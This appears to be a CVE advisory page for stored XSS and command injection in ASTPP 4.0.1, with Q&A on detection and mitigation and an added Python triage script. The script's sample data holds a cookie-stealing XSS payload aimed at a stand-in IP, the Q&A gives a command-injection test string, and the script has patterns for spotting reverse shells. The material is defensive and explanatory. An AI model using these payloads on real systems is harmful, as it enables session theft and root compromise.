CVE-2020-37153
Command Injection and XSS in ASTPP 4.0.1 Enable Root Code Execution
Publication date: 2026-02-11
Last updated on: 2026-02-20
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| inextrix | astpp | 4.0.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2020-37153 affects ASTPP version 4.0.1, an open-source VoIP billing platform. It covers multiple critical flaws: cross-site scripting (XSS) in the SIP device configuration interface and command injection in the plugin management interface.
The flaws chain together. An attacker stores malicious HTML or JavaScript in SIP device parameters; when an administrator views the device, the script runs in the administrator's browser and sends the session cookie to the attacker. With the hijacked administrator session, the attacker then submits shell metacharacters through the plugin installation interface, which passes the input to a system shell and executes arbitrary commands as the web server user.
Because of misconfigured cron job settings, the attacker can then manipulate cron tasks so that the injected code runs with root privileges, giving full remote root access on affected Linux systems.
How can this vulnerability impact me?
This vulnerability can have severe impacts including unauthorized remote code execution with root privileges, complete system compromise, and data theft.
- Attackers can hijack administrator sessions, gaining full control over the ASTPP system.
- They can execute arbitrary commands on the server, potentially installing backdoors or malware.
- Root-level access allows attackers to manipulate system files, escalate privileges, and maintain persistent control.
- Sensitive configuration files containing database credentials and other critical information can be stolen, enabling further exploitation.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detecting this vulnerability means checking the SIP device configuration and plugin management interfaces of ASTPP 4.0.1 for command injection and cross-site scripting (XSS), and checking the host for signs that the chain has already been used. Run active tests only against systems you are authorized to test, preferably a staging copy, because an XSS payload saved into a SIP device record is stored and will fire for every administrator who views that device.
To test the SIP device parameters, enter an HTML or JavaScript payload into fields such as SIP Caller Number and Caller Name, save the device, and reopen it: if the markup is rendered rather than displayed as text, input validation and output encoding are missing. Existing device records can be exported and scanned for HTML tags or event handlers to find payloads that are already stored.
To test the plugin installation interface for command injection, submit a benign command chain such as `system date;id;whoami` and check whether the output of `id` and `whoami` appears in the response; if it does, the field reaches a shell unsanitized.
Additionally, review cron jobs and scheduled tasks (`/etc/crontab`, `/etc/cron.d/*`, and root's crontab) for entries that run as root but execute scripts owned or writable by the web server user; such entries are what allow the attacker to escalate from the web user to root.
Network detection can include monitoring for reverse shell connections, for example a Python process on the ASTPP server holding an established outbound connection to an attacker IP on an uncommon port (e.g. port 4444).
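The three host-side checks above (stored XSS payloads in exported SIP device records, root cron entries that execute web-user-controlled files, and reverse-shell-looking connections in `ss -tnp` output) as one offline triage script. This is an added example, not ASTPP's code and not the advisory's tooling. All inputs are constructed for illustration: the device records, the crontab, the file-ownership map and the `ss` output are invented sample data, and the field names `caller_name` and `caller_number` are assumptions about ASTPP's schema rather than verified column names.

```python
"""Offline triage helpers for the ASTPP 4.0.1 XSS / command-injection chain.

Added example; this is not ASTPP's code. Every input below (SIP device
records, crontab text, file-ownership map, `ss -tnp` output) is constructed
for illustration. Field names such as "caller_name" are assumptions about
ASTPP's schema, not verified column names.
"""
import re

# --- 1. Stored XSS in SIP device records ---------------------------------
# Matches an HTML tag, an inline event handler, or a javascript: URL in a
# record field. Scanning exported records finds payloads already stored.
XSS_RE = re.compile(r"<\s*/?\s*[a-z][\w-]*[^>]*>|on\w+\s*=|javascript:", re.I)

def find_stored_xss(records):
    """Return (record_id, field, value) for every field holding HTML/JS."""
    hits = []
    for rec in records:
        for field, value in rec.items():
            if field != "id" and isinstance(value, str) and XSS_RE.search(value):
                hits.append((rec["id"], field, value))
    return hits

# --- 2. Root cron entries that execute files the web user controls --------
# /etc/crontab and /etc/cron.d entries carry a user column after the five
# schedule fields (or after an @reboot-style shortcut) and before the command.
SYSTEM_CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")

def risky_root_cron(crontab_text, file_info, web_users=("www-data", "asterisk")):
    """Flag root cron entries whose command references a file that is owned
    by the web server user or is world-writable.

    file_info maps a path to (owner, st_mode) as os.stat would report; it is
    passed in so the check can run against a constructed snapshot.
    """
    risky = []
    for line in crontab_text.splitlines():
        m = SYSTEM_CRON_RE.match(line)
        if not m or m.group("user") != "root" or line.lstrip().startswith("#"):
            continue
        # Check every token that names a known file: the interpreter and the
        # script it runs (e.g. "php /var/www/astpp/cron.php").
        for tok in m.group("cmd").split():
            if tok not in file_info:
                continue
            owner, mode = file_info[tok]
            if owner in web_users or mode & 0o002:
                risky.append((tok, owner, f"{mode & 0o777:o}"))
    return risky

# --- 3. Reverse-shell-looking connections in `ss -tnp` output -------------
# An established connection from an interpreter or netcat to an uncommon
# remote port is the pattern the advisory describes (Python shell to :4444).
SS_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)
EXPECTED_PORTS = {25, 53, 80, 443, 3306, 5060, 5061}   # assumption: normal for this host
SHELL_PROCS = {"python", "python2", "python3", "perl", "nc", "ncat", "bash", "sh"}

def reverse_shell_candidates(ss_output):
    """Return (process, pid, peer_host, peer_port) for suspicious connections."""
    hits = []
    for line in ss_output.splitlines():
        m = SS_RE.match(line)
        if not m or m.group("state") != "ESTAB":
            continue
        peer_host, _, peer_port = m.group("peer").rpartition(":")
        if int(peer_port) not in EXPECTED_PORTS and m.group("proc") in SHELL_PROCS:
            hits.append((m.group("proc"), int(m.group("pid")), peer_host, int(peer_port)))
    return hits

# --- Constructed sample data ---------------------------------------------
SAMPLE_DEVICES = [
    {"id": 1, "caller_name": "Front Desk", "caller_number": "2015550100"},
    {"id": 2, "caller_name": '<script>new Image().src="http://203.0.113.9/?c="+document.cookie</script>',
     "caller_number": "2015550101"},
    {"id": 3, "caller_name": "Warehouse", "caller_number": "<img src=x onerror=alert(1)>"},
]
SAMPLE_CRONTAB = """\
# /etc/crontab (constructed)
SHELL=/bin/sh
*/5 * * * * root php /var/www/astpp/cron.php
0 3 * * * root /usr/local/sbin/rotate-cdr.sh
@reboot root /opt/astpp/startup.sh
"""
SAMPLE_FILES = {  # path -> (owner, st_mode), as a constructed stat snapshot
    "/usr/bin/php": ("root", 0o100755),
    "/var/www/astpp/cron.php": ("www-data", 0o100644),   # web user owns a root-run script
    "/usr/local/sbin/rotate-cdr.sh": ("root", 0o100755),
    "/opt/astpp/startup.sh": ("root", 0o100777),         # world-writable, run at boot as root
}
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:44321 198.51.100.20:443 users:(("php-fpm",pid=812,fd=11))
ESTAB 0 0 10.0.0.5:51002 203.0.113.9:4444 users:(("python3",pid=2231,fd=3))
ESTAB 0 0 10.0.0.5:5060 198.51.100.30:5060 users:(("freeswitch",pid=600,fd=40))
"""

if __name__ == "__main__":
    print("stored XSS:", find_stored_xss(SAMPLE_DEVICES))
    print("risky root cron:", risky_root_cron(SAMPLE_CRONTAB, SAMPLE_FILES))
    print("reverse shells:", reverse_shell_candidates(SAMPLE_SS))
```

On a real host, feed `risky_root_cron` the contents of `/etc/crontab` and `/etc/cron.d/*` with a `file_info` built from `os.stat` on the referenced paths, and feed `reverse_shell_candidates` the output of `ss -tnp`; `EXPECTED_PORTS` should be adjusted to the ports the server legitimately talks to.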
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation is to apply patches or upgrade ASTPP to a version in which these vulnerabilities are fixed.
If patching is not immediately possible, restrict access to the SIP device configuration and plugin management interfaces to trusted administrators only, for example by limiting the administrative web interface to a management network or VPN.
Disable or restrict the ability to install or manage plugins through the web interface, since that is where the command injection is reached.
Review and secure cron jobs and scheduled tasks: entries that run as root must not execute scripts that are owned or writable by the web server user, or the web user can escalate to root.
Monitor network traffic for suspicious connections, especially reverse shells or unexpected outbound connections from the ASTPP server.
Enforce input validation and output encoding on the SIP device fields to stop the XSS, and mark the administrator session cookie HttpOnly so that a script running in the browser cannot read it; this removes the cookie theft step the attack chain depends on.